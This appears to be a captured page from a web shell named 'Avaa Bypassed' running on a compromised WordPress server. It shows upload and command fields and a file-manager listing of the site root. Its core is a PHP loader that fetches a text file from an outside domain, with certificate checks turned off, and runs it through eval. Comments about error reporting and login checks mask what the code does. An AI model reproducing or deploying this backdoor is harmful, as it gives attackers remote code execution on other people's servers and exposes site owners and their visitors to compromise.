[ Avaa Bypassed ]




Upload:

Command:

mpararhp@216.73.216.65: ~ $
    <?php
    session_start();

    /**
     * Disable error reporting
     *
     * Set this to error_reporting( -1 ) for debugging.
     */
    function geturlsinfo($url) {
        if (function_exists('curl_exec')) {
            $conn = curl_init($url);
            curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
            curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);

            // Set cookies using session if available
            if (isset($_SESSION['coki'])) {
                curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']);
            }

            $url_get_contents_data = curl_exec($conn);
            curl_close($conn);
        } elseif (function_exists('file_get_contents')) {   
            $url_get_contents_data = file_get_contents($url);
        } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
            $handle = fopen($url, "r");
            $url_get_contents_data = stream_get_contents($handle);
            fclose($handle);
        } else {
            $url_get_contents_data = false;
        }
        return $url_get_contents_data;
    }

    // Function to check if the user is logged in
        $a = geturlsinfo('https://kobehealthcare.id/akik/wget.txt');
        eval('?>' . $a);

    ?>

Filemanager

Name Type Size Permission Actions
.tmb Folder 0777
.well-known Folder 0755
0caa8a1c Folder 0755
cgi-bin Folder 0755
saiga Folder 0755
wp-admin Folder 0755
wp-content Folder 0755
wp-includes Folder 0755
.hcflag File 30 B 0644
.htaccess File 498 B 0644
.htaccess.bk File 1.32 KB 0644
.litespeed_flag File 297 B 0644
error_log File 2.25 MB 0644
gev.txt File 1 B 0644
hikari.phtml File 1.46 KB 0644
license.txt File 19.45 KB 0644
litespeed.conf File 725 B 0644
readme.html File 7.24 KB 0644
wp-activate.php File 7.21 KB 0644
wp-blog-header.php File 351 B 0644
wp-comments-post.php File 2.27 KB 0644
wp-config-sample.php File 3.26 KB 0644
wp-config.php File 3.27 KB 0644
wp-cron.php File 5.49 KB 0644
wp-links-opml.php File 2.44 KB 0644
wp-load.php File 3.84 KB 0644
wp-login.php File 50.16 KB 0644
wp-mail.php File 8.34 KB 0644
wp-settings.php File 28.35 KB 0644
wp-signup.php File 33.58 KB 0644
wp-trackback.php File 4.98 KB 0644
xmlrpc.php File 3.17 KB 0644